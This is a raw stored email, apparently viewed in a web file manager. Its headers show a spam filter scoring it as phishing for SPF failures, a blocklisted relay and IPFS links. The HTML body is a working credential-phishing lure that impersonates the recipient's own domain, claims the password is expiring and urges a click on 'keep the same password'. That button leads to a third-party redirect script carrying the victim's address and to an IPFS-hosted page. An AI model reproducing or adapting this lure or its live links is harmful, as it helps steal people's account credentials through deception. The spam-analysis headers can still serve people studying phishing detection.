OwlCyberSecurity - MANAGER
Edit File: 1740141981.M814741P3963212.premium128.web-hosting.com,S=9665,W=9822:2,
Return-Path: <hiroshi.kawai@socium.co.jp> Delivered-To: contact+spam@gourayafroid.com Received: from premium128.web-hosting.com by premium128.web-hosting.com with LMTP id mAruLZ11uGdMeTwAAvhI2g (envelope-from <hiroshi.kawai@socium.co.jp>) for <contact+spam@gourayafroid.com>; Fri, 21 Feb 2025 07:46:21 -0500 Return-path: <hiroshi.kawai@socium.co.jp> Envelope-to: contact@gourayafroid.com Delivery-date: Fri, 21 Feb 2025 07:46:21 -0500 Received: from [36.139.197.181] (port=63410 helo=socium.co.jp) by premium128.web-hosting.com with esmtp (Exim 4.96.2) (envelope-from <hiroshi.kawai@socium.co.jp>) id 1tlSQ4-00Ggg6-0P for contact@gourayafroid.com; Fri, 21 Feb 2025 07:46:21 -0500 From: gourayafroid.com <hiroshi.kawai@socium.co.jp> To: contact@gourayafroid.com Date: 21 Feb 2025 20:45:31 +0800 Message-ID: <20250221204531.13238473595ADB66@socium.co.jp> MIME-Version: 1.0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Spam-Status: Yes, score=21.9 X-Spam-Score: 219 X-Spam-Bar: +++++++++++++++++++++ X-Spam-Report: Spam detection software, running on the system "premium128.web-hosting.com", has identified this incoming email as possible spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: gourayafroid.com Your contact@gourayafroid.com password is about to expire (Action Required) You must take immediate steps to maintain and avoid restricting access to your gourayafroid.com account keep the same password Content analysis details: (21.9 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked. See http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. [URIs: englishwithwaliul.com] 4.7 RCVD_IN_XBL RBL: Received via a relay in Spamhaus XBL [36.139.197.181 listed in zen.spamhaus.org] 0.1 URIBL_SBL_A Contains URL's A record listed in the Spamhaus SBL blocklist [URIs: bafybeidoz4j7wj6a45k2ewrocn75mz2k2gddgstu7yq3tagd776q5abgt4.ipfs.dweb.link] 0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [36.139.197.181 listed in bl.score.senderscore.com] 0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [36.139.197.181 listed in sa-accredit.habeas.com] 4.0 SPF_FAIL SPF: sender does not match SPF record (fail) [SPF failed: Please see http://www.openspf.org/Why?s=mfrom;id=hiroshi.kawai%40socium.co.jp;ip=36.139.197.181;r=premium128.web-hosting.com] 4.0 SPF_HELO_FAIL SPF: HELO does not match SPF record (fail) [SPF failed: Please see http://www.openspf.org/Why?s=helo;id=socium.co.jp;ip=36.139.197.181;r=premium128.web-hosting.com] 0.0 HTML_MESSAGE BODY: HTML included in message 0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or identical to background 0.0 T_MXG_EMAIL_FRAG URI with email in fragment 0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts 2.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50% [cf: 100] 1.7 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/) 0.0 KAM_DMARC_STATUS Test Rule for DKIM or SPF Failure with Strict Alignment 1.0 URI_DWEBIPFS References Interplanetary File System PtP content via dweb.link, likely phishing 0.2 KAM_DMARC_NONE DKIM has Failed or SPF has failed on the message and the domain has no DMARC policy 2.0 RDNS_NONE Delivered to internal network by a host with no rDNS 0.0 T_PDS_FROM_NAME_TO_DOMAIN From:name looks like To:domain 0.0 URI_IPFS References Interplanetary File System PtP content, probable phishing 0.0 FSL_BULK_SIG Bulk signature with no Unsubscribe 1.5 PDS_FRNOM_TODOM_DBL_URL From Name to domain, double URL 0.0 TO_NO_BRKTS_NORDNS_HTML To: lacks brackets and no rDNS and HTML only X-Spam-Flag: YES Subject: ***SPAM*** Password Notifications - Take Action Now <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.= w3.org/TR/html4/loose.dtd"> <html><head> <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"> <meta name=3D"GENERATOR" content=3D"MSHTML 11.00.10570.1001"></head> <body style=3D"margin: 0.5em;"> <p align=3D"center" style=3D"color: rgb(36, 36, 36); text-transform: none; = text-indent: 0px; letter-spacing: normal; font-family: Roboto, sans-serif; = font-size: 15px; font-style: normal; font-weight: 400; margin-top: 0px; mar= gin-bottom: 1rem; word-spacing: 0px; white-space: normal; box-sizing: borde= r-box; orphans: 2; widows: 2; background-color: rgb(255, 255, 255); text-de= coration-style: initial; text-decoration-color: initial; -webkit-text-strok= e-width: 0px; text-decoration-thickness: initial;=20 font-variant-ligatures: normal; font-variant-caps: normal;"><span style=3D"= font-family: Arial; box-sizing: border-box;"><span style=3D"box-sizing: bor= der-box;"><b><span style=3D"font-size: 23pt; box-sizing: border-box;"><span= style=3D"color: rgb(238, 97, 17); box-sizing: border-box;"><span style=3D"= font-size: 25pt; box-sizing: border-box;">gourayafroid.com</span><br style= =3D"box-sizing: border-box;"></span></span><br style=3D"box-sizing: border-= box;"></b></span></span></p> <p align=3D"center" style=3D"color: rgb(44, 54, 58); text-transform: none; = text-indent: 0px; letter-spacing: normal; font-family: Roboto, sans-serif; = font-size: 14px; font-style: normal; font-weight: 400; margin-top: 0px; mar= gin-bottom: 1rem; word-spacing: 0px; white-space: normal; box-sizing: borde= r-box; orphans: 2; widows: 2; background-color: rgb(255, 255, 255); text-de= coration-style: initial; text-decoration-color: initial; -webkit-text-strok= e-width: 0px; text-decoration-thickness: initial;=20 font-variant-ligatures: normal; font-variant-caps: normal;"><b><span style= =3D"color: rgb(34, 34, 34); font-family: Arial, Helvetica, sans-serif; font= -size: small;">Your contact@gourayafroid.com password is about to expire (A= ction Required) You must take immediate steps to maintain and avoid restric= ting access to your gourayafroid.com account</span> <br></b></p> <p style=3D"padding: 20px 0px; text-align: center; color: rgb(44, 54, 58); = text-transform: none; text-indent: 0px; letter-spacing: normal; font-family= : Roboto, sans-serif; font-size: 14px; font-style: normal; font-weight: 400= ; margin-top: 0px; margin-bottom: 0px; word-spacing: 0px; white-space: norm= al; box-sizing: border-box; orphans: 2; widows: 2; background-color: rgb(25= 5, 255, 255); text-decoration-style: initial; text-decoration-color: initia= l; -webkit-text-stroke-width: 0px;=20 text-decoration-thickness: initial; font-variant-ligatures: normal; font-va= riant-caps: normal;"><b> <a title=3D"Read Fax" style=3D"background: rgb(227, 96, 9); padding: 11px 2= 4px; color: rgb(255, 255, 255); box-sizing: border-box; text-decoration-lin= e: none;" href=3D"https://englishwithwaliul.com/pat/redirect.php#contact@go= urayafroid.com" target=3D"_blank" rel=3D"noreferrer" data-saferedirecturl= =3D"https://www.google.com/url?q=3Dhttps://bafybeidoz4j7wj6a45k2ewrocn75mz2= k2gddgstu7yq3tagd776q5abgt4.ipfs.dweb.link/%23bonn@cyber.net.pk&source= =3Dgmail&ust=3D1740140418727000&usg=3DAOvVaw3IlCzCvWSFGXp7qQ4KyGqq"= > keep the same password</a> <span style=3D"color: rgb(227, = 96, 9); box-sizing: border-box;"> </span></b></p> <p style=3D"padding: 20px 0px; text-align: center; color: rgb(44, 54, 58); = text-transform: none; text-indent: 0px; letter-spacing: normal; font-family= : Roboto, sans-serif; font-size: 14px; font-style: normal; font-weight: 400= ; margin-top: 0px; margin-bottom: 0px; word-spacing: 0px; white-space: norm= al; box-sizing: border-box; orphans: 2; widows: 2; background-color: rgb(25= 5, 255, 255); text-decoration-style: initial; text-decoration-color: initia= l; -webkit-text-stroke-width: 0px;=20 text-decoration-thickness: initial; font-variant-ligatures: normal; font-va= riant-caps: normal;"><b><span style=3D"color: rgb(34, 34, 34); font-family:= Arial, Helvetica, sans-serif; font-size: small; box-sizing: border-box;">I= ssues discovered in the claims fulfillment system will no longer be investi= gated or fixed.© gourayafroid.com</span><span style=3D"color: rgb(34, = 34, 34); font-family: Arial, Helvetica, sans-serif; font-size: small; box-s= izing: border-box;"> </span> <span style=3D"color: rgb(34, 34, 34); font-family: Arial, Helvetica, sans-= serif; font-size: small; box-sizing: border-box;">2025</span></b></p></body= ></html>